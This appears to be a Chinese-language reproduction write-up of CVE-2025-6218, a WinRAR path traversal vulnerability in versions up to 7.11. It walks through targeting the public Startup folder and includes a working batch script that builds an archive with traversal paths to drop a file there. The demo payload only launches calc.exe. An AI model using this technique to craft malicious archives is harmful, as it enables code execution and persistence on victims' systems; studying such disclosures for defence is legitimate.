CVE-2025-6218 WinRAR

简介

总所周知，WinRAR是一款老牌的解压缩软件，知名产品同时也是许多装机必备的软件。近期发现了一个严重安全漏洞，CVE-2025-6218（路径穿越漏洞），攻击者可通过构造恶意的压缩文件，实现在压缩文件解压时可以将文件释放到受害者系统的敏感路径下（例如自启动目录），进而实现远程代码执行或者持久化控制。

攻击需要目标用户访问恶意网页或打开恶意压缩文件，因此容易受到社会工程攻击。

影响&&利用条件

WinRAR 7.11版本及更早版本（2025年6月19日补丁发布前的所有版本）

需要WinRAR 安装在默认位置：C:\Program Files\WinRAR\WinRAR.exe（或已知WinRAR的安装目录）

需要目标用户访问恶意网页或解压缩恶意压缩文件

漏洞利用

思考：利用路径穿越，我们是否可以将一些恶意的脚本文件写入到windows的自启动项中，一般系统的自启动项目录在 C:\Users\[用户名]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

由于 Windows 路径回退（..\）不会跨盘符，因此需要用户设置解压路径在C盘，那么我们就有机会将文件最终落地位置改到自启动目录中。

回看自启动目录的绝对路径，二级目录是用户自定义的用户名，我们无法通过外界手段获取具体的用户名，并且用户解压时我们也无法控制其在执行解压命令时的具体位置，所以回退符少了或者多了会导致我们最终拼接的路径并不正确，因此在拼接具体的解压位置时这里选择 把目标路径选在系统盘的固定公共位置

比如：

• C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup （公共启动文件夹，对所有用户生效）。
• 或 C:\Users\Public\Documents（有写权限的公共文件夹）。

这样只要回退到 C:\，拼接公共路径即可，兼容大部分用户在 C:\Users\XXX\Desktop、C:\Users\XXX\Downloads 等常用目录解压的情况。再结合回退符（..\）不会跨盘符的特性，我们只要拼接足够的回退符就可以提高我们的成功率。

制造恶意zip

Make.bat

@echo off

title CVE-2025-6218 POC

"D:\RAR\WinRAR.exe" a -ap "\..\..\..\..\..\..\..\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\" %~dp0learnsource.zip POC.bat

echo.
if errorlevel 1 (
    echo [!] Failed to create POC.
) else (
    echo [+] CVE-2025-6218.zip created successfully!
)
echo.

del POC.bat

pause

//"D:\RAR\WinRAR.exe" 代表本机上WinRAR软件的路径
//a 代表添加文件到压缩包
//-ap 设置压缩包内的相对路径（就在这里尝试路径穿越）
//%~dp0 代表当前脚本所在的路径

 POC.bat

calc.exe

其中%~dp0LearnSource.zip代表生成的zip文件在当前目录下，且命名为LearnSource。因环境不同，可能执行改脚本时会出现

，这意味着 WinRAR 可能把相对路径理解成了相对它自己执行位置的路径，而不是批处理脚本的位置，需要将脚本放在WinRAR执行文件的目录下，或者可以将该生成路径改为绝对路径

其中POC.bat为需要打包的恶意文件，放在和脚本的同级目录即可

Test

运行生成脚本

放入靶机进行解压缩

解压后文件落地

重启后启动项自动执行

近期WinRAR部分版本已经加上补丁，新增沙盒机制，对于一些敏感目录会强制解压缩到当前录取，复现也许会不成功，考虑跟老版本尝试复现

参考：

WinRAR目录遍历远程代码执行 - FreeBuf网络安全行业门户

WinRAR 缺陷（CVE-2025-6218）：通过目录遍历执行远程代码 | CN-SEC 中文网